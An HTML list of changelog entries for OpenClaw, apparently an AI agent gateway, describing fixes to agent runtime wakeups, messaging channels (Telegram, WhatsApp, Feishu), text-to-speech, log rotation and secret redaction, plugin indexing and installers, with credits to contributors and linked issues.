<li>Agents/runtime: submit heartbeat, cron, and exec wakeups as transient runtime context instead of visible user prompts, keeping synthetic system work out of chat transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261476582" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66496/hovercard" href="https://github.com/openclaw/openclaw/issues/66496">#66496</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264783156" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66814" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66814/hovercard" href="https://github.com/openclaw/openclaw/issues/66814">#66814</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeades/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeades">@jeades</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mandomaker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mandomaker">@mandomaker</a>.</li>
<li>Telegram: include native quote excerpts automatically for threaded replies and reply tags when the original Telegram text is available, without adding another config knob. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3884461774" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6975/hovercard" href="https://github.com/openclaw/openclaw/issues/6975">#6975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rex05ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rex05ai">@rex05ai</a>.</li>
<li>Node/Linux: make <code>openclaw node install</code> enable and restart the <code>openclaw-node</code> systemd unit instead of the gateway unit on node-only VMs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285532256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68287" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68287/hovercard" href="https://github.com/openclaw/openclaw/issues/68287">#68287</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dlebee-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dlebee-agent">@dlebee-agent</a>.</li>
<li>Browser/CDP: retry transient raw-CDP WebSocket handshake failures before any browser command is sent, and reconnect stale persistent Playwright CDP sessions for safe tab-list reads without replaying mutating browser actions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276826431" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67728" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67728/hovercard" href="https://github.com/openclaw/openclaw/issues/67728">#67728</a>.</li>
<li>Gateway/Linux: retry <code>systemctl --user enable</code> after a second daemon reload when the freshly written gateway unit is not visible yet on migrated systemd installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246585581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65184" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65184/hovercard" href="https://github.com/openclaw/openclaw/issues/65184">#65184</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liushuaiiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liushuaiiu">@liushuaiiu</a>.</li>
<li>Telegram: preserve exact selected quote text when sending native quote replies, and retry with legacy replies if Telegram rejects quote parameters. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330007852" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71952/hovercard" href="https://github.com/openclaw/openclaw/pull/71952">#71952</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Plugins/CLI: preserve manifest name, description, format, and source metadata in cold <code>openclaw plugins list</code> output without importing plugin runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Security/audit: read channel exposure and plugin allowlist ownership from read-only plugin index metadata so cold audits do not depend on loaded channel runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/chat: keep <code>/plugins list</code>, <code>/plugins enable</code>, and <code>/plugins disable</code> on the persisted plugin index path so chat plugin management does not load diagnostic/runtime plugin registries before execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/doctor: read workspace plugin status and legacy web-search ownership through installed-index manifest metadata instead of broad manifest registry scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/agents: read channel provider status from read-only plugin index metadata for text <code>agents list</code> output instead of the loaded channel registry. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Logging: redact configured secret patterns at console and file-log sink exits so credentials that reach the logger are masked before terminal display or JSONL persistence. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279976745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67953" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67953/hovercard" href="https://github.com/openclaw/openclaw/issues/67953">#67953</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ziy1-Tan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ziy1-Tan">@Ziy1-Tan</a>.</li>
<li>Gateway/services: refuse process and service mutations from an older OpenClaw binary when the config was last written by a newer version, preventing split-brain installs from stopping or rewriting newer gateway services. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4164454666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57079" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57079/hovercard" href="https://github.com/openclaw/openclaw/issues/57079">#57079</a>.</li>
<li>Gateway: reserve <code>/healthz</code> and <code>/readyz</code> ahead of plugin, canvas, and Control UI HTTP stages so liveness/readiness probes still answer when a later route handler stalls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4301852326" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69674" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69674/hovercard" href="https://github.com/openclaw/openclaw/issues/69674">#69674</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xike-Creek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xike-Creek">@Xike-Creek</a>.</li>
<li>Logging: load <code>logging.file</code> and redaction settings directly from the active OpenClaw config path in bundled runtimes, so packaged gateways stop falling back to <code>/tmp/openclaw</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4191142978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59370" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59370/hovercard" href="https://github.com/openclaw/openclaw/issues/59370">#59370</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268830246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67168" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67168/hovercard" href="https://github.com/openclaw/openclaw/issues/67168">#67168</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207216477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61295" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61295/hovercard" href="https://github.com/openclaw/openclaw/issues/61295">#61295</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KeaneYan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KeaneYan">@KeaneYan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pan9hu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pan9hu">@Pan9hu</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zsjlovelike/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zsjlovelike">@zsjlovelike</a>.</li>
<li>Logging: rotate file logs at <code>logging.maxFileBytes</code>, keep bounded numbered archives, and make long-lived rolling loggers follow the current-day file instead of suppressing diagnostics or writing stale dated files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4182641485" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58583" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58583/hovercard" href="https://github.com/openclaw/openclaw/issues/58583">#58583</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216327509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62381" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62381/hovercard" href="https://github.com/openclaw/openclaw/issues/62381">#62381</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpeghead/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpeghead">@jpeghead</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhaoleink/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhaoleink">@zhaoleink</a>.</li>
<li>Agents/groups: treat clean empty assistant stops as silent <code>NO_REPLY</code> only for always-on groups where silent replies are allowed, while keeping direct and mention-gated sessions on the incomplete-turn retry path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MagnaAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MagnaAI">@MagnaAI</a>.</li>
<li>macOS/Node: keep native remote app nodes from advertising <code>browser.proxy</code>, start browser-capable CLI node services through the restored <code>openclaw node start</code> command, and show an actionable browser-control error when the local control service is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263105927" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66637" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66637/hovercard" href="https://github.com/openclaw/openclaw/issues/66637">#66637</a>.</li>
<li>Gateway/update: fail package updates when the restarted managed gateway reports the wrong version, including fallback restarts and JSON mode, avoiding false-success mixed-version restarts after macOS LaunchAgent updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329551146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71835/hovercard" href="https://github.com/openclaw/openclaw/issues/71835">#71835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Gateway/update: warn before package updates and bundled plugin runtime-dependency repairs when the target volume appears low on disk space, without blocking installs on best-effort filesystem checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329551146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71835/hovercard" href="https://github.com/openclaw/openclaw/issues/71835">#71835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Plugins/runtime deps: surface activated plugin load failures in health and fail package-update restart verification or doctor repair when bundled runtime deps still cannot load, avoiding false-success repairs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329764229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71883/hovercard" href="https://github.com/openclaw/openclaw/pull/71883">#71883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Gateway/Linux: include fnm <code>aliases/default/bin</code> in generated service PATHs and let doctor accept either modern fnm aliases or the legacy <code>current/bin</code> symlink, avoiding false PATH repair prompts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283558641" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68169" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68169/hovercard" href="https://github.com/openclaw/openclaw/issues/68169">#68169</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/richard-scott/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/richard-scott">@richard-scott</a>.</li>
<li>Installer/Linux: run apt installs with noninteractive dpkg and needrestart settings so fresh Ubuntu 24.04 <code>curl | bash</code> installs do not hang while installing Node.js, Git, or build tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046027578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41146" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41146/hovercard" href="https://github.com/openclaw/openclaw/issues/41146">#41146</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iht76/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iht76">@iht76</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexcarv318/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexcarv318">@alexcarv318</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cs3gallery/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cs3gallery">@cs3gallery</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/firofame/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/firofame">@firofame</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgdusek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgdusek">@cgdusek</a>.</li>
<li>Providers/Bedrock: defer the AWS SDK import until Bedrock discovery actually runs so plugin registration and setup stay lightweight on cold start. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328833605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71690/hovercard" href="https://github.com/openclaw/openclaw/issues/71690">#71690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jarvis-ai-gregmoser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jarvis-ai-gregmoser">@jarvis-ai-gregmoser</a>.</li>
<li>Installer/macOS: stop immediately when Homebrew <code>node@24</code> installation fails and avoid printing PATH advice for missing Homebrew Node installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312670571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70411/hovercard" href="https://github.com/openclaw/openclaw/issues/70411">#70411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1fanwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1fanwang">@1fanwang</a>.</li>
<li>WhatsApp: remove ack reactions after a visible reply when <code>messages.removeAckAfterReply</code> is enabled, matching other reaction-capable channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3987412583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/26183" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/26183/hovercard" href="https://github.com/openclaw/openclaw/issues/26183">#26183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrUnforsaken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrUnforsaken">@MrUnforsaken</a>.</li>
<li>Providers/Z.AI: map OpenClaw thinking controls to Z.AI's <code>thinking</code> payload and add opt-in preserved thinking replay via <code>params.preserveThinking</code>, so GLM 5.x can keep prior <code>reasoning_content</code> when requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183616844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58680" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58680/hovercard" href="https://github.com/openclaw/openclaw/issues/58680">#58680</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuanmingguo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuanmingguo">@xuanmingguo</a>.</li>
<li>Channels/status: keep read-only channel lists on manifest and package metadata by default, loading setup runtime only for explicit fallback callers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins: scope setup and web-provider metadata manifest reads to explicit plugin ids when callers already know the owning plugin set. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/onboarding: defer onboarding install-record index writes until the guarded config commit so setup failures cannot leave the plugin index ahead of <code>openclaw.json</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/registry: resolve web provider ownership from the installed plugin index instead of broad manifest scans on secret, tool, and pricing paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Config/providers: accept <code>video</code> and <code>audio</code> in configured model <code>input</code> values and preserve them in provider catalog entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3961456155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/20721" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/20721/hovercard" href="https://github.com/openclaw/openclaw/issues/20721">#20721</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alvinttang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alvinttang">@alvinttang</a>.</li>
<li>Models/auth: honor the parent <code>--agent</code> flag for auth write commands (<code>add</code>, <code>login</code>, <code>setup-token</code>, <code>paste-token</code>, and the GitHub Copilot shortcut) so OAuth/API-key/token results are written to the requested agent store instead of the default agent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329713315" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71864/hovercard" href="https://github.com/openclaw/openclaw/issues/71864">#71864</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329952100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71933" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71933/hovercard" href="https://github.com/openclaw/openclaw/pull/71933">#71933</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/balric-seo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/balric-seo">@balric-seo</a>.</li>
<li>TTS: strip model-emitted TTS directives from streamed block text before channel delivery, including directives split across adjacent blocks, while preserving the accumulated raw reply for final-mode synthesis. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038643518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38937" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38937/hovercard" href="https://github.com/openclaw/openclaw/issues/38937">#38937</a>.</li>
<li>TTS: keep explicit <code>provider=...</code> directive keys scoped to that provider and warn on unsupported keys instead of letting another speech provider consume overlapping keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198945704" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60131" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60131/hovercard" href="https://github.com/openclaw/openclaw/issues/60131">#60131</a>.</li>
<li>TTS/Feishu: normalize final-mode streamed TTS-only audio before delivery so generated voice-note files use the same safe media path and native voice routing as normal final replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329908441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71920" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71920/hovercard" href="https://github.com/openclaw/openclaw/issues/71920">#71920</a>.</li>
<li>Feishu: transcribe inbound voice-note audio with the shared media audio path before agent dispatch and keep raw Feishu <code>file_key</code> payloads out of message text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268134631" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67120/hovercard" href="https://github.com/openclaw/openclaw/issues/67120">#67120</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4211680654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61876" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61876/hovercard" href="https://github.com/openclaw/openclaw/issues/61876">#61876</a>.</li>
<li>Tasks: terminalize async Gateway agent task records from the Gateway run result while preserving aborted, failed, and cancelled outcomes instead of leaving completed runs stuck as active or lost. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329869944" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71905" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71905/hovercard" href="https://github.com/openclaw/openclaw/pull/71905">#71905</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/likewen-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/likewen-tech">@likewen-tech</a>.</li>
<li>WhatsApp: let authorized group voice-note transcripts satisfy mention gating before reply dispatch, while keeping unmentioned transcripts in pending group history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069891043" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44908/hovercard" href="https://github.com/openclaw/openclaw/issues/44908">#44908</a>.</li>
<li>Media understanding: carry channel voice-note preflight state into attachment selection so WhatsApp, Feishu, Telegram, and Discord do not transcribe the same inbound audio twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315503496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70580/hovercard" href="https://github.com/openclaw/openclaw/issues/70580">#70580</a>.</li>
<li>TTS/BlueBubbles: deliver compatible auto-TTS audio as iMessage voice memo bubbles instead of plain MP3/CAF file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3943170481" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/16848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/16848/hovercard" href="https://github.com/openclaw/openclaw/issues/16848">#16848</a>.</li>
<li>TTS: resolve voice-note and voice-memo routing from channel plugin capabilities instead of speech-core-owned channel id lists.</li>
<li>ACP: send subagent and async-task completion wakes to external ACP harnesses as plain prompts instead of OpenClaw internal runtime-context envelopes, while keeping those envelopes out of ACP transcripts.</li>
<li>TTS/status: show configured TTS model, voice, and sanitized custom endpoint in <code>/status</code>, preserve OpenAI-compatible TTS instructions on custom endpoints, and retry empty Microsoft/Edge TTS output once. Addresses <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076830177" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46602/hovercard" href="https://github.com/openclaw/openclaw/issues/46602">#46602</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078185482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47232" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47232/hovercard" href="https://github.com/openclaw/openclaw/pull/47232">#47232</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063664533" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43936/hovercard" href="https://github.com/openclaw/openclaw/pull/43936">#43936</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leekuangtao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leekuangtao">@leekuangtao</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Huntterxx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Huntterxx">@Huntterxx</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rex993/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rex993">@rex993</a>.</li>
<li>Agents/Gateway: steer agent-driven config edits and restarts through the owner-only <code>gateway</code> tool, document <code>config.schema.lookup</code> as the field-doc source, and warn against using <code>gateway stop &amp;&amp; gateway start</code> as a restart substitute on macOS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329939344" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71929" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71929/hovercard" href="https://github.com/openclaw/openclaw/issues/71929">#71929</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ygc3817922006-sketch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ygc3817922006-sketch">@ygc3817922006-sketch</a>.</li>
<li>Media understanding/audio: inject a deterministic transcript placeholder for too-small voice notes so agents do not hallucinate transcription or provider failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087777845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48944/hovercard" href="https://github.com/openclaw/openclaw/issues/48944">#48944</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eulicesl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eulicesl">@eulicesl</a>.</li>
